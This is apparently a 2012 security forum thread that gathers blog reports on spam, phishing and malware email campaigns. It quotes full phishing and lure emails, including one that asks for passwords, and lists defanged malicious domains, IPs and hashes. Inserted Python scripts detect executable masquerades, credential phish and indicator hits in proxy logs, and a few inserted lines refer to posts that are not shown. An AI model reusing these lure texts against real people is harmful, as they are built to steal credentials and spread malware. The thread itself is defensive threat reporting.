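Added example, not part of the Webroot post above: the Facebook lure is a zip whose member is "Picture15-JPG.scr", a screensaver executable named to read as a picture. The check below opens an archive in memory and flags members with an executable extension, a harmless-looking type name buried in the stem, or an "MZ" PE header. The archive it scans is constructed here (the .scr body is a 64-byte fake MZ stub, and "invoice.pdf.exe" is an extra hypothetical member showing the same trick with a document name); none of it is the real sample.

```python
import io
import re
import zipfile

# Extensions Windows will run on double-click; .scr (screensaver) is a plain
# PE executable, which is why it turns up in picture-themed lures.
EXECUTABLE_EXTS = frozenset({"scr", "exe", "com", "pif", "bat", "cmd", "js", "vbs", "jar"})
# Type names a lure borrows from harmless files to dress up an executable.
LURE_TOKENS = frozenset({"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "xls", "txt"})


def assess_member(name, head):
    """Return the findings for one archive member from its name and first bytes."""
    base = name.rsplit("/", 1)[-1].lower()
    stem, _, ext = base.rpartition(".")
    findings = []
    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable extension .{ext}")
        # "picture15-jpg" -> {"picture15", "jpg"}: an image type hidden in the stem
        tokens = set(re.split(r"[^a-z0-9]+", stem)) - {""}
        if tokens & LURE_TOKENS:
            findings.append("image/document name masquerade")
    if head.startswith(b"MZ"):
        findings.append("PE header")
    return findings


def scan_zip(data):
    """Map each suspicious member of a zip (given as bytes) to its findings."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic is needed, not the whole body
            findings = assess_member(info.filename, head)
            if findings:
                results[info.filename] = findings
    return results


def build_sample_zip():
    """Constructed archive standing in for the Picture15.JPG.zip lure.
    The executable bodies are fake 64-byte MZ stubs, not real malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Picture15-JPG.scr", b"MZ" + b"\x00" * 62)
        zf.writestr("invoice.pdf.exe", b"MZ" + b"\x00" * 62)      # hypothetical extra member
        zf.writestr("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 12)  # JPEG SOI marker
        zf.writestr("readme.txt", b"nothing to see here\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(findings))
```

Reading only the first two bytes of each member keeps the scan cheap on large archives; a mail gateway rule that quarantines any zip with a member carrying an executable extension would have stopped this lure regardless of the picture-style name.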
AplusWebMaster
2012-10-22, 17:20
FYI... multiple entries - SCAM-SPAM-and PHISH:
SCAM - worthless domain names: tsnetint .com and tsnetint .org
- http://blog.dynamoo.com/2012/10/scam-tsnetintcom-and-tsnetintorg.html
22 Oct 2012 - "Another episode in a long-running domain scam, which attempts to get you to buy worthless domain names by scaremongering. In this case the fake company is called "Kenal investment Co. Ltd" (there are several legitimate firms with a similar name). If you get one of these, ignore it and don't give the scammers any money.
The domains quoted are tsnetint .com and tsnetint .org and the originating IP is 117.27.141.168, all hosted in deepest China.
From: bertram @tsnetint .com
Date: 22 October 2012 06:02
Subject: Confirmation of Registration
(Letter to the President or Brand Owner, thanks)
Dear President,
We are the department of Asian Domain Registration Service in China. Here I have something to confirm with you. We formally received an application on October 19, 2012 that a company claimed Kenal investment Co. Ltd were applying to register "dynamoo" as their Net Brand and some domain names through our firm.
Now we are handling this registration, and after our initial checking, we found the name were similar to your company's, so we need to check with you whether your company has authorized that company to register these names. If you authorized this, we would finish the registration at once. If you did not authorize, please let us know within 7 workdays, so that we could handle this issue better. After the deadline we will unconditionally finish the registration for Kenal investment Co. Ltd. Looking forward to your prompt reply.
Best Regards,
Bertram Hong
Registration Dept.
Office:Tel: 86 2885915586 || Fax: +86 2885912116
Address:9/F Libao building No,62 Kehua North Road,Wuhou District,Chengdu City,China ..."
___
SPAM with .gov URLs
- http://www.symantec.com/connect/blogs/spam-gov-urls
22 Oct 2012 Updated - "Symantec is observing an increase in spam messages containing .gov URLs. A screenshot of a sample message is below:
> https://www.symantec.com/connect/sites/default/files/images/govURL%201.png
Traditionally, .gov URLs have been restricted to government entities. This brings up the question of how spammers are using .gov URLs in spam messages.
The answer is on this webpage:
1.USA.gov is the result of a collaboration between USA.gov and bitly.com, the popular URL shortening service. Now, whenever anyone uses bitly to shorten a URL that ends in .gov or .mil, they will receive a short, trustworthy 1.usa.gov URL in return.
... While this feature has legitimate uses for government agencies and employees, it has also opened a door for spammers. By using an open-redirect vulnerability, spammers were able to set up a 1.usa.gov URL that leads to a spam website.
Using the above example:
[http ://]1.usa .gov/[REMOVED]/Rxpfn9
leads to
[http ://]labor.vermont .gov/LinkClick.aspx?link=http://workforprofit.net/[REMOVED]/?wwvxo
which leads to
[http ://]workforprofit .net/[REMOVED]/?wwvxo
The final spam page is a work-at-home scam website that has been designed to look like a financial news network website:
https://www.symantec.com/connect/sites/default/files/images/govURL%202.png
To add legitimacy to the website, spammers have designed it so that other links, such as the menu bar at the top and other news articles (not shown in the above picture), actually lead to the financial news website that it is spoofing. However, the links in the article all lead to a different website where the spammer tries to make the sale:
> https://www.symantec.com/connect/sites/default/files/images/govURL%203.article%20thumbnail.png
USA.gov provides data created any time anyone clicks on a 1.usa.gov URL (link available on this webpage). Analysis of data from the last seven days shows that this trend began on October 12. As of October 18, 43,049 clicks were made through 1.usa.gov shortened URLs to these spam domains:
consumeroption .net
consumerbiz .net
workforprofit .net
consumeroptions .net
consumerlifenet .net
consumerbailout .net
consumerlifetoday .net
consumerneeds .net
consumerstoday .net
consumerlivestoday .net
> https://www.symantec.com/connect/sites/default/files/images/govURL%204.png
... This chart shows the number of spam clicks made on a daily basis:
> https://www.symantec.com/connect/sites/default/files/images/govURL%205.png
While taking advantage of URL shorteners or an open-redirect vulnerability is not a new tactic, the fact that spammers can utilize a .gov service to make their own links is worrisome. Symantec encourages users to always follow best practices and exercise caution when opening links even if it is a .gov URL."
___
Phish for regular Webmail Accounts
- https://isc.sans.edu/diary.html?storyid=14356
Last Updated: 2012-10-22 - "I was looking through my spam folder today and saw an interesting phish. The phishing email is looking for email account information. Nothing new about that, except this one seemed to have a broad target range. Normally, these types of phishes are sent to .edu addresses, not those outside of academia. From the email headers, this one was sent to the Handlers email which is a .org. A non-technical user, like many of my relatives, would probably respond to this. I could see this being successful against regular webmail users of Gmail, Hotmail, etc. especially if the verbiage was changed slightly. It could also be targeting those who may be enrolled in online universities... I have included the email below:
From: University Webmaster <university.m @usa .com>
Date: Fri, Oct 19, 2012 at 9:34 PM
Subject: Webmail Account Owner
To:
Dear Webmail Account Owner,
This message is from the University Webmail Messaging Center to all email account owners.
We are currently carrying out scheduled maintenance,upgrade of our web mail service and we are changing our mail host server,as a result your original password will be reset.
We are sorry for any inconvenience caused.
To complete your webmail email account upgrade, you must reply to this email immediately and provide the information requested below.
---
CONFIRM YOUR EMAIL IDENTITY NOW
E-mail Address:
User Name/ID:
Password:
Re-type Password:
---
Failure to do this will immediately render your email address deactivated from the University Webmail..."
___
"Copies of Policies" SPAM / fidelocastroo .ru
- http://blog.dynamoo.com/2012/10/copies-of-policies-spam-fidelocastrooru.html
22 Oct 2012 - "This spam leads to malware on fidelocastroo .ru:
Date: Mon, 22 Oct 2012 08:05:10 -0500
From: Twitter [c-FG6SPPPCGK63=D8154Z4.8N4-6042f@postmaster.twitter.com]
Subject: RE: Charley - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Charley HEALY,
The malicious payload is on [donotclick]fidelocastroo .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (Interneto Vizija, Lithuania)
190.10.14.196 (RACSA, Costa Rica)
202.3.245.13 (MANA, French Polynesia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Plain list for copy and pasting:
68.67.42.41
79.98.27.9
190.10.14.196
202.3.245.13
203.80.16.81
209.51.221.247
Blocking these IPs should prevent any other attacks on the same server."
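The "University Webmaster" message above is a reply-based credential phish: no link, just blank form fields the victim is asked to fill in and send back. The following is an added example, not code from the ISC diary or from anyone quoted on this page, of the kind of heuristic check a mail-filter or SOC script can run over such a message. The sample messages are constructed (the To: address, the helpdesk notice and the exact wording are assumptions), and the free-mail provider list and the regular expressions are assumptions chosen for the example.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample modelled on the "University Webmaster" phish quoted above.
# The To: address and the exact wording are assumptions, not the diary's message.
SAMPLE_PHISH = """\
From: University Webmaster <university.m@usa.com>
To: handlers@example.org
Subject: Webmail Account Owner
Content-Type: text/plain; charset=us-ascii

Dear Webmail Account Owner,
We are currently carrying out scheduled maintenance, as a result your
original password will be reset.
To complete your webmail email account upgrade, you must reply to this
email immediately and provide the information requested below.
CONFIRM YOUR EMAIL IDENTITY NOW
E-mail Address:
User Name/ID:
Password:
Re-type Password:
Failure to do this will immediately render your email address deactivated.
"""

# Constructed benign notice from a real helpdesk, for comparison.
SAMPLE_LEGIT = """\
From: IT Helpdesk <helpdesk@example.edu>
To: staff@example.edu
Subject: Scheduled webmail maintenance
Content-Type: text/plain; charset=us-ascii

Webmail will be unavailable on Saturday 02:00-04:00 while the server moves.
You will not need to change your password. Never send passwords by email;
the helpdesk does not ask for them.
"""

# A line that is only a credential label and a colon: a blank form field the
# victim is expected to fill in and send back.
CREDENTIAL_FIELD = re.compile(
    r"^\s*(password|passwd|re-?type password|user ?name(?:/id)?|pin)\s*:\s*$",
    re.IGNORECASE | re.MULTILINE)
# "reply ... provide/confirm/verify" within a short window of text.
REPLY_INSTRUCTION = re.compile(
    r"\breply\b.{0,80}?\b(provide|confirm|verify|fill)\b", re.IGNORECASE | re.DOTALL)
URGENCY = re.compile(
    r"\b(immediately|within \d+ hours|deactivat\w*|suspend\w*|disabled)\b", re.IGNORECASE)
# Display-name words that claim an institutional role.
AUTHORITY_WORDS = re.compile(
    r"\b(webmaster|administrator|helpdesk|it support|messaging cent(?:er|re))\b", re.IGNORECASE)
# Assumed list of consumer mailbox providers an institution's webmaster would not send from.
FREEMAIL_DOMAINS = {"usa.com", "mail.com", "gmail.com", "hotmail.com", "yahoo.com"}


def reply_phish_findings(raw_message):
    """Return the list of heuristics a raw RFC 5322 message trips.

    An empty list means none fired; the phish above fires all four, the
    helpdesk notice none.
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    display_name, address = parseaddr(msg.get("From", ""))
    sender_domain = address.rpartition("@")[2].lower()
    findings = []

    fields = [m.group(1).lower() for m in CREDENTIAL_FIELD.finditer(body)]
    if any("pass" in f for f in fields):
        findings.append("blank credential form in body, including a password field (%d fields)" % len(fields))
    if REPLY_INSTRUCTION.search(body):
        findings.append("asks the recipient to reply with the requested information")
    if URGENCY.search(body):
        findings.append("threatens deactivation or demands immediate action")
    if AUTHORITY_WORDS.search(display_name) and sender_domain in FREEMAIL_DOMAINS:
        findings.append("institutional display name %r but free-mail sender domain %s"
                        % (display_name, sender_domain))
    return findings


if __name__ == "__main__":
    for label, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(label, reply_phish_findings(sample))
```

The fourth heuristic is the one that survives a change of wording: whatever the verbiage, a "University Webmaster" sending from a consumer mailbox provider is the mismatch to alert on.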
AplusWebMaster
2012-10-23, 13:35
FYI...
Fake PayPal emails serve malware
- http://blog.webroot.com/2012/10/23/paypal-notification-of-payment-received-themed-emails-serve-malware/
Oct 23, 2012 - "... cybercriminals are currently spamvertising millions of emails impersonating PayPal, in an attempt to trick its users into downloading and executing the malicious attachment found in the legitimate looking email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/paypal_spam_email_malware.png
Detection rate for the malicious archive: MD5: 9c2f2cabf00bde87de47405b80ef83c1 * ... Backdoor.Win32.Androm.fm. Once executed, the sample opens a backdoor on the infected host, allowing cybercriminals to gain complete control over the infected host..."
* https://www.virustotal.com/file/1f5f4cb69a892d0bc2e8d6bf17de2087517a7a336523b44536c9b7385c07d67a/analysis/1350578639/
File name: Notification_payment_08_15_2012.exe
Detection ratio: 39/43
Analysis date: 2012-10-18
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake PayPal Account Verification E-mail Messages - October 22, 2012
Fake Payment Confirmation E-mail Messages - October 22, 2012
Fake Picture Link E-mail Messages- October 22, 2012
Fake Portuguese Loan Approval E-mail Messages - October 22, 2012
Malicious Personal Photograph Attachment E-mail Messages - October 22, 2012
Fake UPS Payment Document Attachment E-mail Messages - October 22, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 22, 2012
Fake Changelog E-mail Messages - Updated October 22, 2012
Fake Purchase Order Confirmation E-mail Messages - October 22, 2012...
___
NACHA SPAM / bwdlpjvehrka.ddns .info
- http://blog.dynamoo.com/2012/10/nacha-spam-bwdlpjvehrkaddnsinfo.html
23 Oct 2012 - "This fake NACHA spam leads to malware on bwdlpjvehrka.ddns .info:
Date: Tue, 23 Oct 2012 05:44:05 +0200
From: "noreply@direct.nacha.org"
Subject: Notification about the rejected Direct Deposit payment
Herewith we are informing you, that your most recent Direct Deposit via ACH transaction (#914555512836) was cancelled, due to your current Direct Deposit software being out of date. Please use the link below to enter the secure section of our web site and see the details::
Please contact your financial institution to acquire the new version of the software.
Sincerely yours
ACH Network Rules Department
NACHA | The Electronic Payments Association
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
Phone: 703-561-1100 Fax: 703-787-0996
The malicious payload is at [donotclick]bwdlpjvehrka.ddns .info/links/calls_already_stopping.php hosted on 78.24.222.16 (TheFirst-RU, Russia). Blocking this IP address would be a good move."
___
Intuit SPAM / montrealhotpropertyguide .com
- http://blog.dynamoo.com/2012/10/intuit-spam-montrealhotpropertyguidecom.html
23 Oct 2012 - "This fake Intuit spam leads to malware on montrealhotpropertyguide .com:
Date: Tue, 23 Oct 2012 14:45:14 +0200
From: "Intuit QuickBooks Customer Service" [35378B458 @aubergedesbichonnieres .com]
Subject: Intuit QuickBooks Order
Dear [redacted],
Thank you for placing an order with Intuit QuickBooks!
We have received your payment information and it is currently being processed.
ORDER INFORMATION
Order #: 366948851674
Order Date: Oct 22, 2012
[ View order ]
Qty Item Price
1 Intuit QuickBooks Pro Download 2 2012 $183.96***
Subtotal:
Sales Tax:
Total for this Order: $183.96 $0.00 $183.96
*Appropriate credit will be applied to your account.
Please Note: Sales tax calculations are estimated. The final sales tax calculation will comply with local regulations.
NEED HELP?
Questions about your order? Please visit Customer Service.
Join Us On Facebook
Close More Sales
Save Time
Privacy | Legal | Contact Us | About Intuit
You have received this business communication as part of our efforts to fulfill your request or service your account. You may receive this and other business communications from us even if you have opted out of marketing messages.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it immediately to spoof @intuit .com. Please visit http ://security.intuit .com/ for additional security information.
Please note: This email was sent from an auto-notification system that cannot accept incoming email. Please do not reply to this message.
© 2012 Intuit Inc. or its affiliates. All rights reserved.
The malicious payload is on [donotclick]montrealhotpropertyguide .com/links/showed-clearest-about.php hosted on 64.111.26.15 (Data 102, US)."
AplusWebMaster
2012-10-24, 15:43
FYI... multiple entries:
iPad SCAM ...
- http://www.gfi.com/blog/twitter-dm-lures-recipients-to-ipad-scam/
Oct 24, 2012 - "We have been reading reports of malware and phishing attacks by means of suspicious direct messages to get user systems infected or have user information and credentials stolen, a ploy that is fast becoming common in the Twittersphere now more than ever. One GFI Labs blog reader gave us the heads up on the latest DM currently making rounds on Twitter. The message says:
did you see your pics with her facebook(dot)com/45569965114786…
Users who click the embedded link are led to a Facebook app page, which then executes a PHP script—
> http://www.gfi.com/blog/wp-content/uploads/2012/10/05-background-traffic.png
... —before redirecting them to this:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/01-fake-facebook-event-page-300x181.jpg
It appears to be a genuine Facebook event page; however, the URL makes it obvious that it's not at all related to the said social networking site.
Depending on where users are in the US and UK, they are led to either a survey scam page or a phishing page once they click - Click here.:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/02-ipad-survey-scam-300x222.jpg
...
> http://www.gfi.com/blog/wp-content/uploads/2012/10/03-phishing-page-300x285.png
... Others are redirected to this ad campaign page we’re probably familiar with:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/04-generic-ad-campaign-page-300x201.png
We have determined that more than 4,500 Internet users have visited the dodgy Facebook app page; however, it is unclear how many have fallen victim to these scams... quick reminder to our readers: think before you click..."
___
Contract SPAM / fidelocastroo .ru
- http://blog.dynamoo.com/2012/10/contract-spam-fidelocastrooru.html
24 Oct 2012 - "This fake contract spam leads to malware on fidelocastroo .ru:
Date: Tue, 23 Oct 2012 12:33:51 -0800
From: "Wilburn TIMMONS" [HIWilburn@hotmail.com]
Subject: Fw: Contract from Wilburn
Attachments: Contract_Scan_DS23656.htm
Hello,
In the attached file I am transferring you the Translation of the Job Contract that I have just received today. I am really sorry for the delay.
Best regards,
Wilburn TIMMONS, secretary
The .htm attachment contains obfuscated javascript that attempts to direct the visitor to a malicious [donotclick]fidelocastroo .ru:8080/forum/links/column.php. This domain name has been used in several recent attacks and is currently multihomed on some familiar IP addresses:
202.3.245.13 (President of French Polynesia*)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
* http://blog.dynamoo.com/2012/10/president-of-french-polynesia.html ..."
___
Bogus Windows License SPAM - in the Wild
- http://www.gfi.com/blog/bogus-windows-license-spam-is-in-the-wild/
Oct 24, 2012 - "... Below is a screenshot of a new spam run in the wild... presents to recipients a very suspicious but very free license for Microsoft Windows that they can download. Sounds too good to be true? It probably is.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/01-MSWindowsLic_1022-300x124.png
From: {random email address}
Subject: Re: Fwd: Order N [redacted]
Message body:
Welcome,
You can download your Microsoft Windows License here -
Microsoft Corporation
Clicking the hyperlinked text leads recipients to a number of .ru websites hosting the file, page2.htm (screenshot below), which contains obfuscated JavaScript code that loads the Web page fidelocastroo(dot)ru(colon)8080/forums/links/column(dot)php.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/02-blackhole-300x83.png
This spam is a launchpad for a Blackhole-Cridex attack on user systems. This method is likewise being used by the most recent campaign of the “Copies of Policies” spam*, also in the wild..."
* http://gfisoftware.tumblr.com/tagged/Copies-of-Policies
___
Wire Transfer SPAM / ponowseniks .ru
- http://blog.dynamoo.com/2012/10/wire-transfer-spam-ponowseniksru.html
24 Oct 2012 - "This fake wire transfer spam leads to malware on ponowseniks .ru:
Date: Wed, 24 Oct 2012 04:26:12 -0500
From: FedEx [info@emails.fedex.com]
Subject: Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 9649AA02)
Attachments: Report_Trans99252.htm
Dear Bank Operator,
WIRE TRANSFER: FEDW-30126495944197210
STATUS: REJECTED
You can find details in the attached file. (Internet Explorer format)
The .htm attachment attempts to redirect the user to a malicious page at [donotclick]ponowseniks .ru:8080/forum/links/column.php hosted on some familiar IP addresses:
202.3.245.13 (President of French Polynesia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)"
___
BBB SPAM / samplersmagnifyingglass .net
- http://blog.dynamoo.com/2012/10/bbb-spam-samplersmagnifyingglassnet.html
24 Oct 2012 - "This fake BBB spam leads to malware on samplersmagnifyingglass .net:
Date: Wed, 24 Oct 2012 22:10:18 +0430
From: "Better Business Bureau" [noreply@bbb.org]
Subject: Better Business Beareau Appeal #42790699
Attention: Owner/Manager
Here with the Better Business Bureau notifies you that we have been sent a claim (ID 42790699) from one of your consumers about their dealership with you.
Please view the CLAIMS REPORT down to view more information on this problem and suggest us about your point of view as soon as possible.
On a website above please enter your complain id: 42790699 to review it.
We are looking forward to hearing from you.
-----------------------------------
Faithfully,
Rebecca Wilcox
Dispute advisor
Better Business Bureau
The malicious payload is on [donotclick]samplersmagnifyingglass .net/detects/confirming_absence_listing.php hosted on 183.81.133.121, a familiar IP address belonging to Vodafone in Fiji that has been used several times before and is well worth blocking."
AplusWebMaster
2012-10-25, 15:12
FYI... multiple entries:
Fake UPS emails serve malware ...
- http://blog.webroot.com/2012/10/25/your-ups-invoice-is-ready-themed-emails-serve-malware/
Oct 25, 2012 - "... cybercriminals launched yet another massive spam campaign, impersonating the United Parcel Service (UPS), in an attempt to trick its current and prospective customers into downloading and executing the malicious attachment found in the email. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the victim’s host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/ups_spam_email_malware.png
Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw.
* https://www.virustotal.com/file/d9e1ea5146c93c69836c0d8d430ab99519032228af9da5c6d0c1d295c3f07a5d/analysis/1350581761/
File name: UPS_Delivery_Confirmation.pdf.exe
Detection ratio: 32/43
Analysis date: 2012-10-18
___
Fake Facebook emails lead to malware
- https://www.net-security.org/malware_news.php?id=2302
25.10.2012 - "If you receive an email seemingly sent by Facebook, sharing an offensive comment that has seemingly been left on your Wall by an unknown user, please don't be tempted to follow the link.
> https://www.net-security.org/images/articles/fb-offensive-scam.jpg
... If you do, you'll be -redirected- to a -fake- Facebook page hosting a malicious iFrame script that triggers the infamous Blackhole exploit kit, and if it finds a vulnerability to exploit, you will be automatically saddled with some or other malicious software. The attackers will try to hide the fact by automatically redirecting you to another legitimate Facebook page, belonging to a Facebook user that, according to Sophos*, does not seem to be related to the attack."
* http://nakedsecurity.sophos.com/2012/10/24/offensive-facebook-email-leads-to-blackhole-malware-attack/
___
ADP SPAM / openpolygons .net
- http://blog.dynamoo.com/2012/10/adp-spam-openpolygonsnet.html
25 Oct 2012 - "This fake ADP spam leads to malware on openpolygons .net:
From: warning @adp .com
Sent: Thu 25/10/2012 16:42
Subject: ADP Instant Message
ADP Pressing Communication
Reference No.: 27711
Respected ADP Client October, 25 2012
Your Transaction Report(s) have been uploaded to the web site:
Click Here to access
Please overview the following information:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This email was sent to existing users in your company that access ADP Netsecure.
As general, thank you for using ADP as your business affiliate!
Ref: 27711
> https://lh3.ggpht.com/-xEHpgbIAYcs/UIlsYnnqtcI/AAAAAAAAAwQ/CoQutqaRwmw/s1600/adp-spam.png
The malicious payload is at [donotclick]openpolygons .net/detects/lorrys_implication.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden) which is an IP address that has been seen before. That IP also hosts the fake AV application win8ss .com and another malware site of legacywins .com...
Plain list for copy-and-pasting:
195.198.124.60
openpolygons .net
win8ss .com
legacywins .com ..."
___
"End of Aug. Statement required" SPAM / kiladopje .ru
- http://blog.dynamoo.com/2012/10/end-of-aug-statement-required-spam.html
25 Oct 2012 - "This spam leads to malware on kiladopje .ru:
From: ZaireLomay @mail .com
Sent: 24 October 2012 20:58
Subject: Re: FW: End of Aug. Statement required
Hi,
as reqeusted I give you inovices issued to you per sept. (Internet Explorer format)
Regards
In this case, there's an attachment called Invoices-23-2012.htm with some obfuscated Javascript to direct visitors to a malware laden page at [donotclick]kiladopje .ru:8080/forum/links/column.php hosted on:
79.98.27.9 (Interneto Vizija, Lithuania)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
The following IPs and domains are all related and should be blocked if you can:
68.67.42.41, 72.18.203.140, 79.98.27.9, 84.22.100.108, 85.143.166.170, 132.248.49.112, 190.10.14.196, 202.3.245.13, 203.80.16.81, 209.51.221.247
fidelocastroo .ru
finitolaco .ru
kennedyana .ru
kiladopje .ru
lemonadiom .ru
leprasmotra .ru
ponowseniks .ru
secondhand4u .ru
windowonu .ru ..."
___
Vast email -malware- outbreaks – efaxCorporate and Xerox copiers
- http://blog.commtouch.com/cafe/email-security-news/vast-email-malware-outbreaks-%e2%80%93-efaxcorporate-and-xerox-copiers/
Oct 25, 2012 - "... huge amounts of email-attached malware distributed – all with an "office" theme. The attacks pushed the amount of email up by several hundred percent and totaled near five billion emails sent worldwide.
> http://blog.commtouch.com/cafe/wp-content/uploads/eFax-malware-levels-24-Oct-2012.jpg
The first part of the day saw emails describing an attachment as being the scan from a Xerox Workcenter... Yesterday’s file was a zipped executable. The second part of the attack moved on to eFaxCorporate, announcing the arrival of a (21 page) fax message. Once again the attachment was an executable file pretending to be a PDF. The file is detected as W32/Trojan2.NTLB... The malware scans the infected system for FTP programs – no doubt looking for FTP credentials that can be stolen to access and compromise Web servers (which can then be used to serve malware links).
> http://blog.commtouch.com/cafe/wp-content/uploads/eFax-message.jpg ..."
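The Dynamoo posts above publish their indicators defanged ("fidelocastroo .ru", "[donotclick]...column.php") together with a "plain list for copy-and-pasting". Before those lists can feed a proxy blocklist or a log search they have to be refanged, and the same IOC set is more useful when run against existing proxy logs to find hosts that already visited the landing pages. The block below is an added example of both steps, not code from Dynamoo or from any of the quoted posts. The IOC excerpt reuses indicators from the posts above but its grouping is an assumption; the Squid-style access.log lines are constructed (RFC 1918 clients, documentation addresses for the clean lines); the landing-path check is an assumed pattern distilled from the "/forum/links/column.php" URLs in these posts, not a vendor signature.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed excerpt written in the defanged style of the posts above. The
# indicators appear in those posts; grouping them this way is an assumption.
IOC_TEXT = """\
The malicious payload is on [donotclick]fidelocastroo .ru:8080/forum/links/column.php hosted on:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (Interneto Vizija, Lithuania)
209.51.221.247 (eNET, US)
The following IPs and domains are all related and should be blocked if you can:
68.67.42.41, 72.18.203.140, 202.3.245.13
fidelocastroo .ru
kiladopje .ru
ponowseniks .ru
[donotclick]openpolygons .net/detects/lorrys_implication.php hosted on 195.198.124.60
"""

# Hostname or dotted IP with an optional defanging space before each dot, an
# optional "[donotclick]" prefix and an optional ":port/path" tail.
DEFANGED = re.compile(
    r"(?:\[donotclick\])?([a-z0-9-]+(?: ?\.[a-z0-9-]+)+)((?::\d+)?/\S*)?", re.IGNORECASE)
# Assumed pattern for the exploit-kit landing path shared by the attacks above.
LANDING_PATH = re.compile(r"/forum/links/column\.php$")


def refang(text):
    """Extract (ips, domains, urls) from defanged IOC text."""
    ips, domains, urls = set(), set(), set()
    for m in DEFANGED.finditer(text):
        host = m.group(1).replace(" ", "").lower()
        try:
            ips.add(str(ipaddress.ip_address(host)))
            continue
        except ValueError:
            pass
        if not host.split(".")[-1].isalpha():
            continue  # "column.php"-style fragments are not hostnames
        domains.add(host)
        if m.group(2):
            urls.add("http://" + host + m.group(2))
    return ips, domains, urls


# Constructed Squid native-format access.log lines. Clients are RFC 1918
# addresses; the two clean lines use example.org and a documentation address.
SAMPLE_LOG = """\
1351161234.512   1203 10.0.0.15 TCP_MISS/200 1420 GET http://fidelocastroo.ru:8080/forum/links/column.php - DIRECT/68.67.42.41 text/html
1351161240.001    310 10.0.0.15 TCP_MISS/200 96710 GET http://www.kiladopje.ru:8080/forum/links/column.php - DIRECT/79.98.27.9 application/octet-stream
1351161251.770     15 10.0.0.22 TCP_HIT/200 5120 GET http://www.example.org/index.html - NONE/- text/html
1351161260.300    420 10.0.0.31 TCP_MISS/200 2048 GET http://198.51.100.7/update - DIRECT/198.51.100.7 text/html
1351161266.900     88 10.0.0.31 TCP_MISS/200 2048 GET http://209.51.221.247/forum/links/column.php - DIRECT/209.51.221.247 text/html
"""


def scan_proxy_log(lines, ips, domains):
    """Return one (client, url, reasons) tuple per log line that touches an IOC."""
    hits = []
    for line in lines.splitlines():
        f = line.split()
        if len(f) < 9:
            continue  # not a complete native-format record
        client, url, hierarchy = f[2], f[6], f[8]
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        peer = hierarchy.partition("/")[2]  # "DIRECT/1.2.3.4" -> "1.2.3.4"
        reasons = []
        if host in ips:
            reasons.append("url host is a listed IP")
        if any(host == d or host.endswith("." + d) for d in domains):
            reasons.append("url host is a listed domain or subdomain")
        if peer in ips:
            reasons.append("proxy connected to a listed IP")
        if LANDING_PATH.search(parts.path):
            reasons.append("exploit-kit landing path")
        if reasons:
            hits.append((client, url, reasons))
    return hits


if __name__ == "__main__":
    ips, domains, urls = refang(IOC_TEXT)
    print("block:", sorted(ips) + sorted(domains))
    for client, url, reasons in scan_proxy_log(SAMPLE_LOG, ips, domains):
        print(client, url, "; ".join(reasons))
```

Matching on the peer address as well as the URL host is deliberate: these domains are multihomed and rotate (the same IPs reappear under fionadix, donkihotik and the rest), so a client that reached a listed IP under a domain you have not seen yet is still worth a look.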
AplusWebMaster
2012-10-26, 11:20
FYI... multiple entries:
Share of malicious email by country
- http://www.h-online.com/security/news/item/Germany-gets-the-most-malicious-spam-1737717.html?view=zoom;zoom=1
26 Oct 2012
___
Bogus Skype emails lead to malware...
- http://blog.webroot.com/2012/10/26/bogus-skype-password-successfully-changed-notifications-lead-to-malware/
Oct 26, 2012 - "... millions of emails impersonating Skype, in an attempt to trick Skype users that their password has been successfully changed, and that in order to view their call history and change their account settings, they would need to execute the malicious attachment found in the emails...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/skype_email_spam_malware.png
Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw. Upon execution, the malware opens a backdoor allowing the cybercriminals behind the campaign complete access to the affected user’s host..."
* https://www.virustotal.com/file/d9e1ea5146c93c69836c0d8d430ab99519032228af9da5c6d0c1d295c3f07a5d/analysis/1350584221/
